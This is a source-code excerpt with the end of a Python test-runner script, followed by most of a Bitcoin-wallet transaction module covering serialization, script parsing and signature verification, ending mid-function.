and hasattr(test, "dumpLogs")
):
test.dumpLogs()
results_queue.put(result)
finally:
tests_queue.task_done()
if not broken:
inst.stop()
def expand_suite(suite, target=None):
"""recursively expand a TestSuite into a list of TestCase"""
if target is None:
target = []
for test in suite:
if isinstance(test, unittest.TestSuite):
expand_suite(test, target)
else:
target.append(test)
# randomize because we don't want tests to rely on relative ordering,
# and also because this can help avoid clumping longer-running tests
# together
random.shuffle(target)
return target
def queue_jobs(tests):
for test in tests:
tests_queue.put(test)
all_tests = expand_suite(suite)
if args.debug_watchman:
args.concurrency = 1
elif len(all_tests) < args.concurrency:
args.concurrency = len(all_tests)
queue_jobs(all_tests)
if args.concurrency > 1:
for _ in range(args.concurrency):
t = threading.Thread(target=runner)
t.daemon = True
t.start()
# also send a termination sentinel
tests_queue.put("terminate")
# Wait for all tests to have been dispatched
tests_queue.join()
else:
# add a termination sentinel
tests_queue.put("terminate")
runner()
# Now pull out and aggregate the results
tests_run = 0
tests_failed = 0
tests_skipped = 0
while not results_queue.empty():
res = results_queue.get()
tests_run = tests_run + res.testsRun
tests_failed = tests_failed + len(res.errors) + len(res.failures)
tests_skipped = tests_skipped + len(res.skipped)
if not args.testpilot_json:
print(
"Ran %d, failed %d, skipped %d, concurrency %d"
% (tests_run, tests_failed, tests_skipped, args.concurrency)
)
if "APPVEYOR" in os.environ:
logdir = "logs7" if args.win7 else "logs"
logzip = "%s.zip" % logdir
shutil.copytree(tempfile.tempdir, logdir)
subprocess.call(["7z", "a", logzip, logdir])
subprocess.call(["appveyor", "PushArtifact", logzip])
if "CIRCLE_ARTIFACTS" in os.environ:
print("Creating %s/logs.zip" % os.environ["CIRCLE_ARTIFACTS"])
subprocess.call(
[
"zip",
"-q",
"-r",
"%s/logs.zip" % os.environ["CIRCLE_ARTIFACTS"],
temp_dir.get_dir(),
]
)
if tests_failed or (tests_run == 0):
if args.keep_if_fail:
temp_dir.set_keep(True)
if args.testpilot_json:
# When outputting JSON, our return code indicates if we successfully
# produced output or not, not whether the tests passed. The JSON
# output contains the detailed test pass/failure information.
sys.exit(0)
sys.exit(1)
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes,
P2PKH_prefix, P2PKH_suffix, P2SH_prefix, P2SH_suffix)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(ValueError):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte'253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
def read_boolean(self): return self.read_bytes(1)[0] != 0
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
def write_boolean(self, val): return self.write(b'\x01' if val else b'\x00')
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
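# Worked examples of the compact-size encoding above (illustrative):
#   100   -> b'\x64'                  (single byte, < 253)
#   300   -> b'\xfd\x2c\x01'          (0xfd prefix + uint16 little-endian)
#   70000 -> b'\xfe\x70\x11\x01\x00'  (0xfe prefix + uint32 little-endian)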
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(bytes):
return bytes.hex()
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(bytes):
t = bytes.hex()
if len(t) < 11:
return t
return t[0:4]+"..."+t[-4:]
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
return False
for i in range(len(decoded)):
if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4 and decoded[i][0]>0:
continue # Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.
if to_match[i] != decoded[i][0]:
return False
return True
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = Script.get_ops(_bytes)
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (33 or 65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = Script.get_ops(s)
# the following throws an exception when the redeemScript has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
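# Example (illustrative): a 2-of-3 multisig redeemScript decodes to
#   [OP_2, <pubkey1>, <pubkey2>, <pubkey3>, OP_3, OP_CHECKMULTISIG]
# so m = OP_2 - OP_1 + 1 = 2, n = OP_3 - OP_1 + 1 = 3, and match_multisig is
# [op_m, OP_PUSHDATA4, OP_PUSHDATA4, OP_PUSHDATA4, op_n, OP_CHECKMULTISIG].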
def get_address_from_output_script(_bytes):
scriptlen = len(_bytes)
if scriptlen == 23 and _bytes.startswith(P2SH_prefix) and _bytes.endswith(P2SH_suffix):
# Pay-to-script-hash
return TYPE_ADDRESS, Address.from_P2SH_hash(_bytes[2:22])
if scriptlen == 25 and _bytes.startswith(P2PKH_prefix) and _bytes.endswith(P2PKH_suffix):
# Pay-to-pubkey-hash
return TYPE_ADDRESS, Address.from_P2PKH_hash(_bytes[3:23])
if scriptlen == 35 and _bytes[0] == 33 and _bytes[1] in (2,3) and _bytes[34] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (compressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:34])
if scriptlen == 67 and _bytes[0] == 65 and _bytes[1] == 4 and _bytes[66] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (uncompressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:66])
# note: we don't recognize bare multisigs.
return TYPE_SCRIPT, ScriptOutput.protocol_factory(bytes(_bytes))
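# Script layouts recognized above (illustrative byte patterns; the exact
# prefix/suffix constants are imported from .address):
#   P2SH  (23 bytes): OP_HASH160 <20-byte script hash> OP_EQUAL
#   P2PKH (25 bytes): OP_DUP OP_HASH160 <20-byte pubkey hash> OP_EQUALVERIFY OP_CHECKSIG
#   P2PK  (35 or 67 bytes): <33- or 65-byte pubkey> OP_CHECKSIG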
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
del d['scriptSig']
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = format(opcodes.OP_1 + m - 1, 'x')
op_n = format(opcodes.OP_1 + n - 1, 'x')
keylist = [op_push(len(k)//2) + k for k in public_keys]
return op_m + ''.join(keylist) + op_n + 'ae'
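# Worked example (illustrative): for a 2-of-3 script, op_m = hex(OP_1 + 1) = '52'
# and op_n = '53', so the result is '52' + <three pushed 33-byte pubkeys> + '53'
# + 'ae' (OP_CHECKMULTISIG).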
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
# Note: this function is CRITICAL to get the correct order of pubkeys in
# multisignatures; avoid changing.
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
transaction with signatures from the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighashbyte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
are Schnorr signatures (Schnorr signatures are always 64 bytes + 1) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self.invalidate_common_sighash_cache()
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
# For already-complete transactions, scriptSig will be set and we prefer
# to use it verbatim in order to get an exact reproduction (including
# malleated push opcodes, etc.).
scriptSig = txin.get('scriptSig', None)
if scriptSig is not None:
return scriptSig
# For partially-signed inputs, or freshly signed transactions, the
# scriptSig will be missing and so we construct it from pieces.
_type = txin['type']
if _type == 'coinbase':
raise RuntimeError('Attempted to serialize coinbase with missing scriptSig')
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
raise RuntimeError('Cannot serialize unknown input with missing scriptSig')
return script
@classmethod
def is_txin_complete(cls, txin):
if txin['type'] == 'coinbase':
return True
num_sig = txin.get('num_sig', 1)
if num_sig == 0:
return True
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin
and txin.get('scriptSig') is None
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def invalidate_common_sighash_cache(self):
''' Call this to invalidate the cached common sighash (computed by
`calc_common_sighash` below).
This function is for advanced usage of this class where the caller
has mutated the transaction after computing its signatures and would
like to explicitly delete the cached common sighash. See
`calc_common_sighash` below. '''
try: del self._cached_sighash_tup
except AttributeError: pass
def calc_common_sighash(self, use_cache=False):
""" Calculate the common sighash components that are used by
transaction signatures. If `use_cache` enabled then this will return
already-computed values from the `._cached_sighash_tup` attribute, or
compute them if necessary (and then store).
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Returns three 32-byte objects: (hashPrevouts, hashSequence, hashOutputs).
Warning: If you modify non-signature parts of the transaction
afterwards, this cache will be wrong! """
inputs = self.inputs()
outputs = self.outputs()
meta = (len(inputs), len(outputs))
if use_cache:
try:
cmeta, res = self._cached_sighash_tup
except AttributeError:
pass
else:
# minimal heuristic check to detect bad cached value
if cmeta == meta:
# cache hit and heuristic check ok
return res
else:
del cmeta, res, self._cached_sighash_tup
hashPrevouts = Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs)))
hashSequence = Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs)))
hashOutputs = Hash(bfh(''.join(self.serialize_output(o) for o in outputs)))
res = hashPrevouts, hashSequence, hashOutputs
# cache the resulting value, along with some minimal metadata to defensively
# program against cache invalidation (due to class mutation).
self._cached_sighash_tup = meta, res
return res
def serialize_preimage(self, i, nHashType=0x00000041, use_cache = False):
""" See `.calc_common_sighash` for explanation of use_cache feature """
if (nHashType & 0xff) != 0x41:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
txin = self.inputs()[i]
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
hashPrevouts, hashSequence, hashOutputs = self.calc_common_sighash(use_cache = use_cache)
preimage = nVersion + bh2u(hashPrevouts) + bh2u(hashSequence) + outpoint + scriptCode + amount + nSequence + bh2u(hashOutputs) + nLocktime + nHashType
return preimage
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
def txid_fast(self):
''' Returns the txid by immediately calculating it from self.raw,
which is faster than calling txid() which does a full re-serialize
each time. Note this should only be used for tx's that you KNOW are
complete and that don't contain our funny serialization hacks.
(The is_complete check is also not performed here because that
potentially can lead to unwanted tx deserialization). '''
if self.raw:
return self._txid(self.raw)
return self.txid()
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
''' Will return the sum of all input values, if the input values
are known (may consult self.fetched_inputs() to get a better idea of
possible input values). Will raise InputValueMissing if input values
are missing. '''
try:
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
except (KeyError, TypeError, ValueError) as e:
raise InputValueMissing from e
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
''' Try to calculate the fee based on the input data and return it as
fixoshis (int). Can raise InputValueMissing on tx's where fee data is
missing, so client code should catch that. '''
# first, check if coinbase; coinbase tx always has 0 fee
if self.inputs() and self._inputs[0].get('type') == 'coinbase':
return 0
# otherwise just sum up all values - may raise InputValueMissing
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
'''Return an estimate of the serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig', -1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
